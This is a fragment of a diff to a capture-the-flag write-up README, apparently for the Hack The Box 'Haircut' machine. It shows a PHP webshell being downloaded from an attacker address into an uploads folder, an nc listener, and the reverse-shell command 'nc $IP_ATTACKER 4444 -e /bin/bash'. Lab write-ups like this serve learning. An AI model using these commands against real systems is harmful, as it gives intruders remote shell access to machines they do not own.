notsag-dev/htb-haircut/README.md

 10.10.14.23:8000/Predator.php -o uploads/Predator.php
 ```

-Now, going to `uploads/Predator.php` the webshell can be accessed.
+The shell is accessible from `uploads/Predator.php`, so let's set up a reverse shell using it.

 Set `nc` listener in the attacker to handle the reverse shell:
 ```
 nc -lvp 4444
 ```

 The webshell allows the user to execute in a shell.
-We hit the handler:
+Connect to the attacker as follows:
 ```
 nc $IP_ATTACKER 4444 -e /bin/bash
 ```